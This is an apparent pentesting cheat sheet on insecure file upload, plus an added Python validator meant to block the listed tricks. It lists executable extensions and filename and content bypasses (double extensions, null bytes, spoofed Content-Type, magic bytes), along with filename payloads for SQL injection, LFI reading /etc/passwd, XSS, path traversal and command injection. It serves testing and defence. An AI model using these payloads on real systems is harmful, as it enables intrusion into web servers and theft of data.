Insecure File Upload
Default extensions
PHP
    .php
    .php2
    .php3
    .php4
    .php5
    .php7
    .pht
    .shtml
    .phps
    .phar
    .phpt
    .pgif
    .phtml
    .phtm
    .inc
    .htaccess
ASP
    .asp
    .aspx
    .cer
    .asa
    .ashx
    .asmx
    .axd
    .cshtm
    .cshtml
    .rem
    .soap
JSP
    .jsp
    .jspx
    .jsw
    .jspf
    .jsv
    .wss
    .do
    .action
Perl
    .pl
    .pm
    .cgi
    .lib
Coldfusion
    .cfm
    .cfml
    .cfc
    .dbm
Flash
    .swf
Erlang Yaws Web Server
    .yaws
Bypasses
Double extensions
    file.jpg.php
    file.php.jpg
    file.php.blah123jpg
    file.png.php
    file.png.Php5
    file.php%00.png
    file.php%0d%0a.png
    file.php%0a.png
    file.php\x00.png
Null byte
    file.php%00.gif
    file.php\x00.gif
    file.php%00.png
    file.php\x00.png
    file.php%00.jpg
    file.php\x00.jpg
Special characters
    file.php......
    file.php%20
    file.php%0a
    file.php%00
    file.php%0d%0a
    file.php/
    file.php.\
    file.
    file.pHp5....
    file.%E2%80%AEphp.jpg
Content-type Bypass
    #Original name but different content-type
    Content-Type: image/jpeg
    Content-Type: image/gif
    Content-Type: image/png
Magic bytes
    #Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
    PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
    JPG: \xff\xd8\xff
    GIF: GIF87a
    GIF: GIF8
Triple equal
    /?file=shell.php <-- Blocked
    /?file===shell.php <-- Bypassed
Filename Vulnerabilities:
    #Time-Based SQLi Payloads
    poc.js'(select*from(select(sleep(20)))a)+'.extension

    #LFI Payloads
    image.png../../../../../../../etc/passwd

    #XSS Payloads
    '"><img src=x onerror=alert(document.domain)>.extension

    #File Traversal
    ../../../tmp/lol.png

    #Command Injection
    ; sleep 10;
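A server-side check that refuses the filename, Content-Type and magic-byte tricks listed above, given as an added example that is not part of the original page. The image-only policy and the names ALLOWED, NAME_RE, validate_upload and is_accepted are assumptions of this example.

```python
import re
import uuid

# Assumed policy for this example: image uploads only.
# Allowed extension -> accepted leading signature bytes.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# One base name, exactly one dot, one extension. Everything else is refused:
# second extensions, trailing dots or spaces, slashes, '%', NUL, CR/LF,
# quotes, ';' and non-ASCII such as U+202E (right-to-left override).
NAME_RE = re.compile(r"([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,8})")


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a server-generated storage name or raise ValueError.

    The client-supplied Content-Type is deliberately not a parameter:
    it is attacker-controlled and carries no evidence about the file.
    """
    # fullmatch, not search or '$': '$' would accept a trailing newline.
    m = NAME_RE.fullmatch(client_name)
    if m is None:
        raise ValueError("filename not in canonical form")
    ext = m.group(2).lower()  # case-fold so 'Php5' and 'PNG' compare correctly
    if ext not in ALLOWED:
        raise ValueError("extension not on the allowlist")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content signature does not match extension")
    # Signature bytes can be prepended to anything, so a passing file is still
    # untrusted data. The client name is discarded; only the vetted extension
    # survives, attached to a random name.
    return f"{uuid.uuid4().hex}.{ext}"


def is_accepted(client_name: str, data: bytes) -> bool:
    """Convenience wrapper: True if validate_upload accepts the upload."""
    try:
        validate_upload(client_name, data)
        return True
    except ValueError:
        return False
```

Because a matching signature does not prove the rest of the file is an image, store accepted uploads under the returned name in a location where the web server never executes scripts.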